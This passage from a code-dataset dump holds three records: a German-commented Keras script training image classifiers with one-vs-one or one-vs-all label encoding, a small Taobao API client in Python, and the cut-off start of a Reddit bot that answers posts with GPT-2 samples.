wird der Mittelwert der Pixel im Trainsplit vom Train- und Testsplit abgezogen\n x_train_mean = np.mean(x_train, axis=0)\n x_train -= x_train_mean\n x_test -= x_train_mean\n\n return x_train, y_train, x_test, y_test\n\n\ndef get_ovo_matrix(num_classes: int):\n \"\"\"Berechnet die OvO-Kodierungsmatrix passend zu num_classes\"\"\"\n global _OVO_MATRIX_TRANSPOSED\n np.set_printoptions(threshold=sys.maxsize)\n # Liste mit allen Klassifikatoren, gespeichert als Tupel (a,b) -> Dieser Klassifikator unterscheidet\n # Klasse a vs Klasse b\n classifier_pair = []\n # Baue Liste mit Klassifikatoren\n for lower_limit in range(2, num_classes + 1):\n for i in range(0, num_classes - lower_limit + 1):\n classifier_pair.append((lower_limit - 1, lower_limit + i))\n print(\"Paare von Klassifikatoren für die Kodierungs-Matrix:\")\n print(classifier_pair)\n # Anzahl an Klassifikatoren sollte mit dem Ergebnis der Formel aus Pawara et al. übereinstimmen\n assert classifier_pair.__len__() == num_classes * (num_classes - 1) // 2\n\n # Erstelle leere Matrix [_num_classes X Anzahl Klassifikatoren]\n matrix = np.zeros((num_classes, num_classes * (num_classes - 1) // 2), dtype=float)\n # Fülle Matrix abhängig von aktueller Zeilennummer (True Class)\n for row in range(matrix.__len__()):\n for col in range(matrix[row].__len__()):\n # Hole Klassifikator (Paar von zu trennenden Klassen) aus Klassifikator Liste\n classifier_one, classifier_two = classifier_pair[col]\n # (Paare von zu trennenden Klassen fangen bei 1 an, row und col bei 0)\n # Wenn True-Class nicht vom aktuellen Klassifikator (Spalte) getrennt wird, lasse 0 stehen\n if classifier_one != row + 1 and classifier_two != row + 1:\n continue\n # Wenn 1. Klasse von aktuellem Klassifikator der True-Class entspricht, fülle Zelle mit 1\n elif classifier_one == row + 1 and classifier_two != row + 1:\n matrix[row][col] = 1\n # Wenn 2. Klasse von aktuellem Klassifikator der True-Class entspricht, fülle Zelle mit -1\n elif classifier_one != row + 1 and classifier_two == row + 1:\n matrix[row][col] = -1\n else:\n # Sollte nie passieren\n print(\"Fehler! Kodierungs-Matrix falsch berechnet\")\n exit(12)\n # Transponiere die Matrix (macht später die Berechnungen einfacher)\n _OVO_MATRIX_TRANSPOSED = matrix.transpose()\n print(\"Kodierungs-Matrix für OvO:\")\n print(_OVO_MATRIX_TRANSPOSED)\n print(20 * \"-\")\n return _OVO_MATRIX_TRANSPOSED\n\n\ndef convert_labels_to_ovo(labels: np.array, num_classes: int):\n \"\"\"Label zu OvO-Kodierung konvertieren\"\"\"\n print(\"Mappe Klassennummer zu OvO-Vektor...\")\n ovo_encoded_labels = np.zeros((labels.__len__(), num_classes * (num_classes - 1) // 2))\n for label_index in range(0, labels.__len__()):\n # OvO-Matrix ist transposed. 
i.e. rows and columns are swapped; fetch the complete column for the class number\n ovo_encoded_labels[label_index] = _OVO_MATRIX_TRANSPOSED[:, labels[label_index]]\n if _VERBOSE:\n print(\"%s mapped to \" % (labels[label_index] + 1))\n print(ovo_encoded_labels[label_index])\n print(20 * \"-\")\n return ovo_encoded_labels\n\n\ndef evaluate_model(model, x, y_true, is_ovo, save_dir: Path, train_test: str):\n \"\"\"Evaluates a given model on the given data and returns metrics for it.\n 'save_dir' specifies where the network output and the expected and predicted class numbers are saved as numpy arrays\n 'train_test' is merely a string used to tell the saved numpy arrays for train and test (in the same folder)\n apart from each other\"\"\"\n np.set_printoptions(threshold=sys.maxsize)\n if is_ovo: # OvO\n # determine the predicted class number for the input data\n output_prediction = model.predict(x)\n one_hot_pred = np.matmul(output_prediction, _OVO_MATRIX_TRANSPOSED)\n predicted_classes = np.argmax(one_hot_pred, axis=1)\n\n # determine the expected class number from the OvO encoding\n y_true_one_hot = np.matmul(y_true, _OVO_MATRIX_TRANSPOSED)\n y_true_classes = np.argmax(y_true_one_hot, axis=1)\n # compute the accuracy\n correct_predictions = np.equal(predicted_classes, y_true_classes)\n acc = correct_predictions.mean() * 100\n # compute the loss (with OvO-encoded y_true and y_pred)\n loss = ovo_crossentropy_loss(y_true=y_true, y_pred=output_prediction).eval(session=tf.compat.v1.Session())\n else: # OvA\n # determine loss and accuracy\n loss_acc = model.evaluate(x, y_true)\n acc = loss_acc[1] * 100 # accuracy at index 1\n loss = loss_acc[0]\n # compute the network output plus predicted and expected class numbers for saving\n output_prediction = model.predict(x)\n predicted_classes = np.argmax(output_prediction, axis=1)\n y_test_classes = np.argmax(y_true, axis=1)\n\n # save 'output_prediction', 'predicted_classes' and 'y_test_classes' as individual files in 'save_dir'\n np.save(save_dir / (\"raw_net_output_\" + train_test + \".npy\"), output_prediction)\n np.save(save_dir / (\"predicted_classes_\" + train_test + \".npy\"), predicted_classes)\n np.save(save_dir / (\"true_classes_\" + train_test + \".npy\"), y_test_classes)\n return acc, loss\n\n\ndef train(dataset: str, fold: str, img_size: int, is_ovo: bool, net_type: str, epochs: int, is_finetune: bool,\n train_percent: int, learning_rate: float, extra_info=\"\"):\n \"\"\"Trains a network with the given parameters, evaluates it and writes the results as numpy arrays\n to a folder and 
to the log file\"\"\"\n global init_learning_rate, _OVO_MATRIX_TRANSPOSED\n start = datetime.now()\n # list the given parameters\n print(20 * \"-\" + \"Parameters for the training\" + 20 * \"-\")\n print(\"Dataset: %s\" % dataset)\n print(\"Fold: %s\" % fold)\n print(\"Image size: %s\" % img_size)\n print(\"Encoding: %s\" % (\"OvO\" if is_ovo else \"OvA\"))\n print(\"Network: %s\" % net_type)\n print(\"Epochs: %s\" % epochs)\n print(\"Weights: %s\" % (\"Finetune\" if is_finetune else \"Scratch\"))\n print(\"Percentage of the train split: %s\" % train_percent)\n print(\"Initial learning rate: %f\" % learning_rate)\n print(66 * \"-\")\n\n # set the learning rate\n init_learning_rate = learning_rate\n\n # set the weights (scratch or pretrained on ImageNet)\n weights = None\n if is_finetune:\n weights = \"imagenet\"\n # derive the number of classes from the dataset name (the number at the end of the dataset name is the class count)\n last_digits = 0\n for c in dataset[::-1]:\n if c.isdigit():\n last_digits += 1\n else:\n break\n\n num_classes = int(dataset[len(dataset) - last_digits:])\n print(\"Number of classes: %s\" % num_classes)\n\n # different network variants\n\n if net_type.lower() in [\"resnet\", \"resnet50\", \"r\"]:\n net_type = \"R\"\n # drop the first and last layer (include_top=False) and use a custom input shape\n model = keras.applications.resnet50.ResNet50(weights=weights, include_top=False,\n input_shape=(img_size, img_size, 3))\n out = model.output\n # restore the second-to-last layer (as it would be in the original network)\n out = keras.layers.GlobalAveragePooling2D()(out)\n elif net_type.lower() in [\"inception-pawara\", \"inceptionv3-pawara\", \"ip\"]:\n net_type = \"IP\"\n # drop the first and last layer (include_top=False) and use a custom input shape\n model = keras.applications.inception_v3.InceptionV3(weights=weights, include_top=False,\n input_shape=(img_size, img_size, 3))\n\n # change the last layers as in the code of Pawara et al.\n x = model.output\n x = keras.layers.BatchNormalization()(x)\n x = keras.layers.Activation('relu')(x)\n x = keras.layers.AveragePooling2D(pool_size=(8, 8))(x)\n x = keras.layers.Dropout(0.4)(x)\n out = keras.layers.Flatten()(x)\n elif net_type.lower() in [\"inception\", \"inceptionv3\", \"i\"]:\n net_type = \"I\"\n\n # drop the first and last layer (include_top=False) and use a custom input shape\n model = keras.applications.inception_v3.InceptionV3(weights=weights, include_top=False,\n input_shape=(img_size, img_size, 3))\n out = model.output\n # restore the second-to-last layer (as it would be in the original network)\n out = keras.layers.GlobalAveragePooling2D()(out)\n\n else:\n print(\"Network %s is not supported\" % net_type)\n exit(11)\n # directory to store everything about this model\n current_model_string = dataset + \",\" + str(img_size) + \",\" + (\n \"OvO\" if is_ovo else \"OvA\") + \",\" + net_type + \",\" + (\"F\" if is_finetune else \"S\") + \",\" + str(\n train_percent) + \",\" + str(epochs) + \",\" + str(fold) + \",\" + str(extra_info)\n\n # group several folds of the same network into a subfolder\n current_model_folder_name = extra_info + \",\" + dataset + \",\" + str(img_size) + \",\" + (\n \"OvO\" if is_ovo else \"OvA\") + \",\" + net_type + \",\" + (\"F\" if is_finetune else \"S\") + \",\" + str(\n train_percent) + \",\" + str(epochs)\n save_dir = _WORK_DIR / \"saved_results\" / current_model_folder_name.replace(\",\", \"_\").replace(\".\", \",\") / str(fold)\n save_dir_cp = _WORK_DIR / 
\"saved_checkpoints\"\n cp_name = str(extra_info) + \",\" + current_model_string + \".cp\"\n\n if save_dir.exists():\n print(\"Der Ordner für die aktuelle Konfiguration existiert bereits!\")\n print(str(save_dir))\n exit(13)\n save_dir.mkdir(parents=True)\n save_dir_cp.mkdir(parents=True, exist_ok=True)\n optimizer = keras.optimizers.Adam(lr=get_learning_rate(0))\n\n # Datensatz laden\n x_train, y_train, x_test, y_test = load_dataset(dataset, fold, train_percent, is_ovo, img_size)\n\n steps_per_epoch = x_train.__len__() // _BATCH_SIZE if x_train.__len__() // _BATCH_SIZE > 0 else 1\n\n # Data Augmentation (bis zu 10% shiften vertikal und horizontal, horizontal spiegeln)\n if _DATA_AUGMENTATION:\n data_augmentation = keras.preprocessing.image.ImageDataGenerator(\n featurewise_center=False,\n samplewise_center=False,\n featurewise_std_normalization=False,\n samplewise_std_normalization=False,\n zca_whitening=False,\n rotation_range=0,\n width_shift_range=0.1,\n height_shift_range=0.1,\n horizontal_flip=True,\n vertical_flip=False)\n data_augmentation.fit(x_train)\n\n if is_ovo:\n # Y-Label müssen von Klassennummer (z.B. 5) zu OvO-Vektor kodiert werden\n get_ovo_matrix(num_classes) # speichert OvO-Matrix für passende Klassenanzahl in globale Variable _OVO_MATRIX\n y_train = convert_labels_to_ovo(y_train, num_classes)\n y_test = convert_labels_to_ovo(y_test, num_classes)\n\n output_layer_size = (num_classes * (num_classes - 1)) // 2\n # Modell für OvO vorbereiten (tanh() als letzte Schicht im Netz einfügen)\n output_layer = keras.layers.Dense(output_layer_size, kernel_initializer=\"he_normal\", activation=\"tanh\")(out)\n model = keras.models.Model(inputs=model.inputs, outputs=output_layer)\n model.compile(loss=ovo_crossentropy_loss, optimizer=optimizer,\n metrics=[ovo_crossentropy_loss, ovo_accuracy_metric])\n else: # OvA\n output_layer_size = num_classes\n # Softmax Schicht am Ende des Netzes einfügen für OvA\n output_layer = keras.layers.Dense(output_layer_size, kernel_initializer=\"he_normal\", activation=\"softmax\")(\n out)\n model = keras.models.Model(inputs=model.inputs, outputs=output_layer)\n model.compile(loss='categorical_crossentropy', optimizer=optimizer,\n metrics=['accuracy', \"categorical_crossentropy\"])\n\n checkpoint = keras.callbacks.ModelCheckpoint(filepath=str(save_dir_cp / cp_name), monitor=\"val_loss\",\n verbose=1,\n save_best_only=True)\n callbacks = [checkpoint, keras.callbacks.LearningRateScheduler(get_learning_rate)]\n\n model.summary()\n # Trainiere Netz (mit oder ohne Data-Augmentation)\n if _DATA_AUGMENTATION:\n history = model.fit_generator(data_augmentation.flow(x_train, y_train, batch_size=_BATCH_SIZE),\n validation_data=(x_test, y_test),\n epochs=epochs, shuffle=True, workers=1, verbose=1,\n steps_per_epoch=steps_per_epoch,\n callbacks=callbacks) # TODO workers=4 in Pawara, thread safe warning\n else:\n history = model.fit(x=x_train, y=y_train, batch_size=_BATCH_SIZE,\n validation_data=(x_test, y_test),\n epochs=epochs, shuffle=True, workers=1, verbose=1,\n steps_per_epoch=steps_per_epoch,\n callbacks=callbacks) # TODO workers=4 in Pawara, thread safe warning\n end = datetime.now()\n elapsed = (end - start).total_seconds() / 60 # benötigte Zeit für das Training (und Laden des Datensatzes)\n\n # Speichere die history als pickle-Datei\n with open(save_dir / \"historySave.dat\", 'wb') as pickle_file:\n pickle.dump(history.history, pickle_file)\n\n # Acc und Loss für Test und Train ausrechnen\n acc_test, loss_test = evaluate_model(model, x_test, y_test, is_ovo, 
save_dir, \"test\")\n acc_train, loss_train = evaluate_model(model, x_train, y_train, is_ovo, save_dir, \"train\")\n # Ergebnis in Logdatei schreiben\n with open(save_dir.parent.parent / \"allModelsLog.txt\", \"a+\") as log_file:\n log_string = \"%s,%.2f,%s,%s,\" % (\n get_gpu_name(), elapsed, _BATCH_SIZE, learning_rate) + current_model_string + \",\" + str(\n loss_train) + \",\" + str(acc_train) + \",\" + str(loss_test) + \",\" + str(acc_test)\n log_file.write(log_string + \"\\n\")\n print(log_string)\n print(\"Finale Accuracy (Train): \" + str(acc_train))\n print(\"Finaler Loss (Train): \" + str(loss_train))\n print(\"Finale Accuracy (Test): \" + str(acc_test))\n print(\"Finaler Loss (Test): \" + str(loss_test))\n\n\ndef str2bool(s: str):\n \"\"\"Konvertiert einen String in einen Boolean\"\"\"\n\n if s.lower() in [\"true\", \"yes\", \"1\"]:\n return True\n elif s.lower() in [\"false\", \"no\", \"0\"]:\n return False\n else:\n print(\"Fehler: Boolean erwartet! %s ist nicht als Boolean interpretierbar\" % s)\n exit(1)\n\n\ndef parse_arguments():\n p = argparse.ArgumentParser(description=\"Training mit übergebenen Parametern\")\n p.add_argument(\"--dataset\", type=str, help=\"Name des Datensatzes in \" + str(_DATASET_DIR))\n p.add_argument(\"--fold\", type=str, help=\"Name des Foldes (z.B. \\\"exp1\\\")\")\n p.add_argument(\"--img_size\", type=int, help=\"Größe des Bildes in Pixeln\")\n p.add_argument(\"--is_ovo\", type=str2bool, help=\"True für OvO Ansatz\")\n p.add_argument(\"--net_type\", type=str, help=\"Name des Netzes (resnet, inception-pawara oder inception)\")\n p.add_argument(\"--epochs\", type=int, help=\"Anzahl an zu trainierenden Epochen\")\n p.add_argument(\"--is_finetune\", type=str2bool,\n help=\"True für finetuning des Netzes, False für scratch-training\")\n p.add_argument(\"--train_percent\", type=int, help=\"Prozentsatz des zu verwendenden Train-Splits\")\n p.add_argument(\"--learning_rate\", type=float,\n help=\"Initiale Learning-Rate (z.B. 0.001 oder 0.0001)\")\n p.add_argument(\"--extra_info\", type=str, help=\"Kommentar / Markierung für Ergebnisse im\"\n \"CSV-Log (z.B. verwendete TF Version)\")\n args = p.parse_args()\n\n # Prüfe ob alle Argumente angegeben wurden\n if args.dataset is None:\n print(\"Parameter --dataset wird benötigt!\")\n exit(2)\n if args.fold is None:\n print(\"Parameter --fold wird benötigt!\")\n exit(3)\n if args.img_size is None:\n print(\"Parameter --img_size wird benötigt!\")\n exit(4)\n if args.is_ovo is None:\n print(\"Parameter --is_ovo wird benötigt!\")\n exit(5)\n if args.net_type is None:\n print(\"Parameter --net_type wird benötigt!\")\n exit(6)\n if args.epochs is None:\n print(\"Parameter --epochs wird benötigt!\")\n exit(7)\n if args.is_finetune is None:\n print(\"Parameter --is_finetune wird benötigt!\")\n exit(8)\n if args.train_percent is None:\n print(\"Parameter --train_percent wird benötigt!\")\n exit(9)\n if args.learning_rate is None:\n print(\"Parameter --learning_rate wird benötigt!\")\n exit(10)\n if args.extra_info is None:\n extra_info = \"\"\n else:\n extra_info = args.extra_info\n\n # Trainiere mit angegebenen Parametern\n train(dataset=args.dataset, fold=args.fold, img_size=args.img_size, is_ovo=args.is_ovo, net_type=args.net_type,\n epochs=args.epochs, is_finetune=args.is_finetune, train_percent=args.train_percent,\n learning_rate=args.learning_rate, extra_info=extra_info)\n\n\ndef get_gpu_name():\n # Workaround für Modulfehler, s. 
Imports\n devices = tfclient.device_lib.list_local_devices()\n for device in devices:\n if device.device_type == \"GPU\":\n device_string = device.physical_device_desc.split(\",\")[1].replace(\"name:\", \"\").strip()\n return device_string\n\n\nif __name__ == \"__main__\":\n parse_arguments()\n", "sub_path": "Code/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 24049, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pathlib.Path", "line_number": 18, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 19, "usage_type": "call"}, {"api_name": "tensorflow.zeros_like", "line_number": 52, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.__version__", "line_number": 59, "usage_type": "attribute"}, {"api_name": "tensorflow.log", "line_number": 59, "usage_type": "attribute"}, {"api_name": "tensorflow.math", "line_number": 59, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.single", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.tensordot", "line_number": 71, "usage_type": "call"}, {"api_name": "tensorflow.tensordot", "line_number": 72, "usage_type": "call"}, {"api_name": "keras.backend.argmax", "line_number": 74, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 74, "usage_type": "attribute"}, {"api_name": "keras.backend.argmax", "line_number": 75, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 75, "usage_type": "attribute"}, {"api_name": "keras.backend.equal", "line_number": 77, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 77, "usage_type": "attribute"}, {"api_name": "keras.backend.mean", "line_number": 78, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 78, "usage_type": "attribute"}, {"api_name": "tflearn.data_utils.data_utils.image_preloader", "line_number": 94, "usage_type": "call"}, {"api_name": "tflearn.data_utils.data_utils", "line_number": 94, "usage_type": "attribute"}, {"api_name": "tflearn.data_utils", "line_number": 94, "usage_type": "name"}, {"api_name": "tflearn.data_utils.data_utils.image_preloader", "line_number": 96, "usage_type": "call"}, {"api_name": "tflearn.data_utils.data_utils", "line_number": 96, "usage_type": "attribute"}, {"api_name": "tflearn.data_utils", "line_number": 96, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.set_printoptions", "line_number": 136, "usage_type": "call"}, {"api_name": "sys.maxsize", "line_number": 136, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 178, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 181, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 192, "usage_type": "name"}, {"api_name": "numpy.set_printoptions", "line_number": 197, "usage_type": "call"}, {"api_name": "sys.maxsize", "line_number": 197, 
"usage_type": "attribute"}, {"api_name": "numpy.matmul", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.equal", "line_number": 208, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.Session", "line_number": 211, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 211, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 219, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 224, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 225, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 234, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 234, "usage_type": "name"}, {"api_name": "keras.applications.resnet50.ResNet50", "line_number": 271, "usage_type": "call"}, {"api_name": "keras.applications", "line_number": 271, "usage_type": "attribute"}, {"api_name": "keras.layers.GlobalAveragePooling2D", "line_number": 275, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 275, "usage_type": "attribute"}, {"api_name": "keras.applications.inception_v3.InceptionV3", "line_number": 279, "usage_type": "call"}, {"api_name": "keras.applications", "line_number": 279, "usage_type": "attribute"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 284, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 284, "usage_type": "attribute"}, {"api_name": "keras.layers.Activation", "line_number": 285, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 285, "usage_type": "attribute"}, {"api_name": "keras.layers.AveragePooling2D", "line_number": 286, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 286, "usage_type": "attribute"}, {"api_name": "keras.layers.Dropout", "line_number": 287, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 287, "usage_type": "attribute"}, {"api_name": "keras.layers.Flatten", "line_number": 288, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 288, "usage_type": "attribute"}, {"api_name": "keras.applications.inception_v3.InceptionV3", "line_number": 293, "usage_type": "call"}, {"api_name": "keras.applications", "line_number": 293, "usage_type": "attribute"}, {"api_name": "keras.layers.GlobalAveragePooling2D", "line_number": 297, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 297, "usage_type": "attribute"}, {"api_name": "keras.optimizers.Adam", "line_number": 321, "usage_type": "call"}, {"api_name": "keras.optimizers", "line_number": 321, "usage_type": "attribute"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 330, "usage_type": "call"}, {"api_name": "keras.preprocessing", "line_number": 330, "usage_type": "attribute"}, {"api_name": "keras.layers.Dense", "line_number": 351, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 351, "usage_type": "attribute"}, {"api_name": "keras.models.Model", "line_number": 352, "usage_type": "call"}, {"api_name": "keras.models", "line_number": 352, "usage_type": "attribute"}, {"api_name": "keras.layers.Dense", "line_number": 358, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 
358, "usage_type": "attribute"}, {"api_name": "keras.models.Model", "line_number": 360, "usage_type": "call"}, {"api_name": "keras.models", "line_number": 360, "usage_type": "attribute"}, {"api_name": "keras.callbacks.ModelCheckpoint", "line_number": 364, "usage_type": "call"}, {"api_name": "keras.callbacks", "line_number": 364, "usage_type": "attribute"}, {"api_name": "keras.callbacks.LearningRateScheduler", "line_number": 367, "usage_type": "call"}, {"api_name": "keras.callbacks", "line_number": 367, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 383, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 383, "usage_type": "name"}, {"api_name": "pickle.dump", "line_number": 388, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 419, "usage_type": "call"}, {"api_name": "tensorflow.python.client.device_lib.list_local_devices", "line_number": 476, "usage_type": "call"}, {"api_name": "tensorflow.python.client.device_lib", "line_number": 476, "usage_type": "attribute"}, {"api_name": "tensorflow.python.client", "line_number": 476, "usage_type": "name"}]} +{"seq_id": "351001396", "text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n'''\ntaobao simple sdk\nauthor:stone\nemail:thisisbaozi@gmail.com\n'''\n\nimport json\nimport hashlib\nfrom urllib import urlencode\nfrom httplib import HTTPConnection\nfrom time import time\n\n_HTTP_GET_REQUEST = 'GET'\n_HTTP_POST_REQUEST = 'POST'\n\n\n'''taoabo top paramter alias'''\n_TAOBAO_P_SIGN = 'sign'\n_TAOBAO_P_SIGN_METHOD = 'sign_method'\n_TAOBAO_P_APPKEY = 'app_key'\n_TAOBAO_P_API = 'method'\n_TAOBAO_P_SESSION = 'session'\n_TAOBAO_P_VERSION = 'v'\n_TAOBAO_P_ACCESS_TOKEN = 'access_token'\n_TAOBAO_P_FORMAT = 'format'\n_TAOBAO_P_TIMESTAMP = 'timestamp'\n_TAOBAO_P_PARTNER_ID = 'partner_id'\n_TAOBAO_P_SDK_VERSION = 'taobao-sdk-python-20121002'\n\n\n'''default config'''\n_DEFAULT_TAOBAO_TOP_REST = '/router/rest'\n_DEFAULT_TAOBAO_TOP_URL = 'gw.api.taobao.com'\n_DEFAULT_TAOBAO_TOP_PORT = 80\n_DEFAULT_TAOBAO_TOP_TIMEOUT = 30\n\nclass SdkException(Exception):\n\t'''sdk exception'''\n\tpass\n\nclass RequestException(Exception):\n\t'''http request exception'''\n\tpass\n\nclass Sign(object):\n\t'''generate sign'''\n\t_sign = None\n\n\tdef __init__(self, app_key, app_serect, app_session, app_func, func_param):\n\t\tsystem_params = {\n\t\t\t_TAOBAO_P_FORMAT : 'json',\n\t\t\t_TAOBAO_P_APPKEY : app_key,\n\t\t\t_TAOBAO_P_SIGN_METHOD : 'md5',\n\t\t\t_TAOBAO_P_VERSION : '2.0',\n\t\t\t_TAOBAO_P_TIMESTAMP : str(long(time() * 1000)),\n\t\t\t_TAOBAO_P_PARTNER_ID : _TAOBAO_P_SDK_VERSION,\n\t\t\t_TAOBAO_P_API : app_func.replace('_', '.')\n\t\t}\n\n\t\tif app_session:\n\t\t\tsystem_params[_TAOBAO_P_SESSION] = app_session\n\t\tsign_params = system_params.copy()\n\t\tsign_params.update(func_param)\n\n\t\tkeys = sign_params.keys()\n\t\tkeys.sort()\n\t\tparams = '%s%s%s' % (app_serect, str().join('%s%s' % (key, sign_params[key]) for key in keys), app_serect)\n\t\tsystem_params[_TAOBAO_P_SIGN] = hashlib.md5(params).hexdigest().upper()\n\t\tself._sign = system_params\n\n\tdef generate_url(self):\n\t\treturn '%s?%s' % (_DEFAULT_TAOBAO_TOP_REST, urlencode(self._sign))\n\n\nclass HttpRequest(object):\n\t'''http request '''\n\tdef __init__(self, taobao_topclient, method):\n\t\tself.client = taobao_topclient\n\t\tself.method = method\n\n\n\tdef __getattr__(self, func):\n\t\tdef wrap(**func_param):\n\t\t\tsign = Sign(app_serect = self.client.app_serect, app_key = self.client.app_key, app_session = 
self.client.app_session, app_func = func, func_param = func_param)\n\t\t\trequest_url = sign.generate_url()\n\t\t\trequest_body = urlencode(func_param)\n\t\t\trequest_header = {\n\t\t\t\t'Content-type' : 'application/x-www-form-urlencoded',\n\t\t\t\t'Cache-Control' : 'no-cache',\n\t\t\t\t'Connection' : 'Keep-Alive'\n\t\t\t}\n\t\t\n\t\t\treturn self.client.get_response(self.method, request_url, request_body, request_header)\t\n\t\treturn wrap\n\nclass TaobaoSdkClient(object):\n\t'''taobao sdk '''\n\n\tdef __init__(self, app_key, app_serect, app_session = None, domain = None, port = None):\n\t\tself.app_key = app_key\n\t\tself.app_serect = app_serect\n\t\tself.app_session = app_session\n\t\tself.domain = domain or _DEFAULT_TAOBAO_TOP_URL\n\t\tself.port = port or _DEFAULT_TAOBAO_TOP_PORT\n\n\t\tself.get = HttpRequest(self, _HTTP_GET_REQUEST)\n\t\tself.post = HttpRequest(self, _HTTP_POST_REQUEST)\n\n\tdef get_response(self, http_method, request_url, request_body, request_header):\n\t\thttp_connection = HTTPConnection(self.domain, self.port, _DEFAULT_TAOBAO_TOP_TIMEOUT)\n\t\thttp_connection.connect()\n\t\thttp_connection.request(http_method, request_url, body = request_body, headers = request_header)\n\t\thttp_response = http_connection.getresponse()\n\n\t\tif http_response.status != 200:\n\t\t\traise RequestException('invalid http status ' + str(http_response.status) + ', detail body :' + http_response.read())\n\t\thttp_request_data = http_response.read()\n\n\t\tjson_data_obj = json.loads(http_request_data)\n\t\tif 'error_response' in json_data_obj:\n\t\t\t#todo detailed error handling\n\t\t\treturn json_data_obj\n\n\t\treturn json_data_obj\n\n\n\n", "sub_path": "taobao.py", "file_name": "taobao.py", "file_ext": "py", "file_size_in_byte": 3755, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "time.time", "line_number": 57, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 70, "usage_type": "call"}, {"api_name": "urllib.urlencode", "line_number": 74, "usage_type": "call"}, {"api_name": "urllib.urlencode", "line_number": 88, "usage_type": "call"}, {"api_name": "httplib.HTTPConnection", "line_number": 112, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 121, "usage_type": "call"}]}
+{"seq_id": "390888596", "text": "#!/usr/bin/python\nimport sys\nimport praw\nimport re\nimport random\nimport os\nimport pbd\nimport string\nimport time\nimport functools\nfrom joblib import Parallel, delayed, parallel_backend\nfrom threading import Lock\nimport tqdm\nimport fire\nimport json\nimport tensorflow as tf\nimport numpy as np\nimport pexpect\n\nimport model, sample, encoder\n\ndef clean_input(s):\n return ''.join(filter(lambda x: x in set(string.printable), s))\n\nclass StreamList():\n def __init__(self):\n self.stream_file = open(\"/mnt/stream_list.txt\", 'r+')\n self.list = self._load()\n\n def __del__(self):\n self.stream_file.close()\n\n def _load(self):\n out = []\n for line in self.stream_file:\n out.append(line.strip())\n print(\"loaded subms\", out)\n return out\n\n def append(self, data):\n self.stream_file.write(str(data)+\"\\n\")\n self.stream_file.flush()\n self.list.append(data)\n\nclass GPT2Bot():\n def __init__(self, log):\n self.log = log\n self.lock = Lock()\n self.stream_guy = False\n self.t_man = False\n self.reddit = praw.Reddit('gptbot')\n self.rexp = re.compile(r\"^(.*)gpt-2(.*)finish this(.*)$\", re.IGNORECASE|re.DOTALL)\n self.name = self.reddit.user.me().name\n self.stream_list = 
StreamList()\n self.key_word = \"gpt-2\"\n self.output = None\n self.callback = None\n self.sample = None\n \n def run_loop(self):\n while True:\n try:\n self.run_mt(32)\n except KeyboardInterrupt:\n self.log(\"\\nUser pressed ctrl-c...\")\n break\n\n def get_response(self, input_str):\n sample = str(\"\\n======================================== SAMPLE 1 ======================================== I'm having some trouble understanding you. Make sure you don't have any special characters in your prompt.\").encode('utf-8')\n\n attempts = 0\n while attempts < 5:\n try:\n child = pexpect.spawn('python src/interactive_conditional_samples.py --top_k 40')\n child.expect('Model prompt >>> ')\n child.sendline(clean_input(input_str))\n child.expect('================================================================================')\n sample = child.before[len(input_str):]\n break\n except pexpect.exceptions.EOF:\n child.kill(0)\n attempts += 1\n print(\"Attempt \", attempts, \"failed. Trying again.\")\n return sample.decode()\n\n def clean_response(self, resp, inp, user=None):\n resp = str(resp[92:]).encode('utf-8')\n resp = 